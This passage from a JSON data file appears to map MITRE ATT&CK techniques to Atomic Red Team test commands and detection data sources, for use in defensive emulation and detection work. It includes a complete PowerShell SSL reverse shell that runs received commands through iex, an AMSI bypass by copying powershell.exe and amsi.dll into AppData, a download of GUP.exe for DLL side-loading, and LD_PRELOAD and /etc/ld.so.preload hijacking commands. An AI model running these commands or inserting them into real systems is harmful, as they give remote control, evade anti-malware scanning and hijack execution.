endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1573", + "command_list": [ + "$server_ip = 127.0.0.1\n$server_port = #{server_port}\n$socket = New-Object Net.Sockets.TcpClient('127.0.0.1', '#{server_port}')\n$stream = $socket.GetStream()\n$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))\n$sslStream.AuthenticateAsClient('fakedomain.example', $null, \"Tls12\", $false)\n$writer = new-object System.IO.StreamWriter($sslStream)\n$writer.Write('PS ' + (pwd).Path + '> ')\n$writer.flush()\n[byte[]]$bytes = 0..65535|%{0};\nwhile(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)\n{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);\n$sendback = (iex $data | Out-String ) 2>&1;\n$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';\n$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);\n$sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}\n", + "$server_ip = #{server_ip}\n$server_port = 443\n$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', '443')\n$stream = $socket.GetStream()\n$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))\n$sslStream.AuthenticateAsClient('fakedomain.example', $null, \"Tls12\", $false)\n$writer = new-object System.IO.StreamWriter($sslStream)\n$writer.Write('PS ' + (pwd).Path + '> ')\n$writer.flush()\n[byte[]]$bytes = 0..65535|%{0};\nwhile(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)\n{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);\n$sendback = (iex $data | Out-String ) 2>&1;\n$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';\n$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);\n$sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}\n" + ], + "commands": [ + { + "command": "$server_ip = 127.0.0.1\n$server_port = #{server_port}\n$socket = New-Object Net.Sockets.TcpClient('127.0.0.1', '#{server_port}')\n$stream = $socket.GetStream()\n$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))\n$sslStream.AuthenticateAsClient('fakedomain.example', $null, \"Tls12\", $false)\n$writer = new-object System.IO.StreamWriter($sslStream)\n$writer.Write('PS ' + (pwd).Path + '> ')\n$writer.flush()\n[byte[]]$bytes = 0..65535|%{0};\nwhile(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)\n{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);\n$sendback = (iex $data | Out-String ) 2>&1;\n$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';\n$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);\n$sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}\n", + "source": "atomics/T1573/T1573.yaml", + "name": "Atomic Red Team Test - Encrypted Channel" + }, + { + "command": "$server_ip = #{server_ip}\n$server_port = 443\n$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', '443')\n$stream = $socket.GetStream()\n$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))\n$sslStream.AuthenticateAsClient('fakedomain.example', $null, \"Tls12\", $false)\n$writer = new-object System.IO.StreamWriter($sslStream)\n$writer.Write('PS ' + (pwd).Path + '> ')\n$writer.flush()\n[byte[]]$bytes = 0..65535|%{0};\nwhile(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)\n{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);\n$sendback = (iex $data | Out-String ) 2>&1;\n$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';\n$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);\n$sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}\n", + "source": "atomics/T1573/T1573.yaml", + "name": "Atomic Red Team Test - Encrypted Channel" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1573", + "display_name": "Encrypted Channel", + "atomic_tests": [ + { + "name": "OpenSSL C2", + "auto_generated_guid": "21caf58e-87ad-440c-a6b8-3ac259964003", + "description": "Thanks to @OrOneEqualsOne for this quick C2 method.\nThis is to test to see if a C2 session can be established using an SSL socket.\nMore information about this technique, including how to set up the listener, can be found here:\nhttps://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926\n\nUpon successful execution, powershell will make a network connection to 127.0.0.1 over 443.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "server_ip": { + "description": "IP of the external server", + "type": "String", + "default": "127.0.0.1" + }, + "server_port": { + "description": "The port to connect to on the external server", + "type": "String", + "default": "443" + } + }, + "executor": { + "command": "$server_ip = #{server_ip}\n$server_port = #{server_port}\n$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', '#{server_port}')\n$stream = $socket.GetStream()\n$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))\n$sslStream.AuthenticateAsClient('fakedomain.example', $null, \"Tls12\", $false)\n$writer = new-object System.IO.StreamWriter($sslStream)\n$writer.Write('PS ' + (pwd).Path + '> ')\n$writer.flush()\n[byte[]]$bytes = 0..65535|%{0};\nwhile(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)\n{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);\n$sendback = (iex $data | Out-String ) 2>&1;\n$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';\n$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);\n$sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1574.001", + "command_list": [ + "copy %windir%\\System32\\windowspowershell\\v1.0\\powershell.exe %APPDATA%\\updater.exe\ncopy %windir%\\System32\\amsi.dll %APPDATA%\\amsi.dll\n%APPDATA%\\updater.exe -Command exit\n" + ], + "commands": [ + { + "command": "copy %windir%\\System32\\windowspowershell\\v1.0\\powershell.exe %APPDATA%\\updater.exe\ncopy %windir%\\System32\\amsi.dll %APPDATA%\\amsi.dll\n%APPDATA%\\updater.exe -Command exit\n", + "source": "atomics/T1574.001/T1574.001.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: DLL Search Order Hijacking" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1574.001", + "display_name": "Hijack Execution Flow: DLL Search Order Hijacking", + "atomic_tests": [ + { + "name": "DLL Search Order Hijacking - amsi.dll", + "auto_generated_guid": "8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3", + "description": "Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface)\nhttps://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/\n\nUpon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "copy %windir%\\System32\\windowspowershell\\v1.0\\powershell.exe %APPDATA%\\updater.exe\ncopy %windir%\\System32\\amsi.dll %APPDATA%\\amsi.dll\n%APPDATA%\\updater.exe -Command exit\n", + "cleanup_command": "del %APPDATA%\\updater.exe >nul 2>&1\ndel %APPDATA%\\amsi.dll >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1574.002", + "command_list": [ + "#{gup_executable}\n", + "PathToAtomicsFolder\\T1574.002\\bin\\GUP.exe\n" + ], + "commands": [ + { + "command": "#{gup_executable}\n", + "source": "atomics/T1574.002/T1574.002.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: DLL Side-Loading" + }, + { + "command": "PathToAtomicsFolder\\T1574.002\\bin\\GUP.exe\n", + "source": "atomics/T1574.002/T1574.002.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: DLL Side-Loading" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1574.002", + "display_name": "Hijack Execution Flow: DLL Side-Loading", + "atomic_tests": [ + { + "name": "DLL Side-Loading using the Notepad++ GUP.exe binary", + "auto_generated_guid": "65526037-7079-44a9-bda1-2cb624838040", + "description": "GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded.\nUpon execution, calc.exe will be opened.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "process_name": { + "description": "Name of the created process", + "type": "String", + "default": "calculator.exe" + }, + "gup_executable": { + "description": "GUP is an open source signed binary used by Notepad++ for software updates", + "type": "Path", + "default": "PathToAtomicsFolder\\T1574.002\\bin\\GUP.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Gup.exe binary must exist on disk at specified location (#{gup_executable})\n", + "prereq_command": "if (Test-Path #{gup_executable}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true\" -OutFile \"#{gup_executable}\"\n" + } + ], + "executor": { + "command": "#{gup_executable}\n", + "cleanup_command": "taskkill /F /IM #{process_name} >nul 2>&1\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1574.006", + "command_list": [ + "sudo sh -c 'echo #{path_to_shared_library} > /etc/ld.so.preload'\n", + "sudo sh -c 'echo /tmp/T1574006.so > /etc/ld.so.preload'\n", + "LD_PRELOAD=#{path_to_shared_library} ls\n", + "LD_PRELOAD=/tmp/T1574006.so ls\n" + ], + "commands": [ + { + "command": "sudo sh -c 'echo #{path_to_shared_library} > /etc/ld.so.preload'\n", + "source": "atomics/T1574.006/T1574.006.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: LD_PRELOAD" + }, + { + "command": "sudo sh -c 'echo /tmp/T1574006.so > /etc/ld.so.preload'\n", + "source": "atomics/T1574.006/T1574.006.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: LD_PRELOAD" + }, + { + "command": "LD_PRELOAD=#{path_to_shared_library} ls\n", + "source": "atomics/T1574.006/T1574.006.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: LD_PRELOAD" + }, + { + "command": 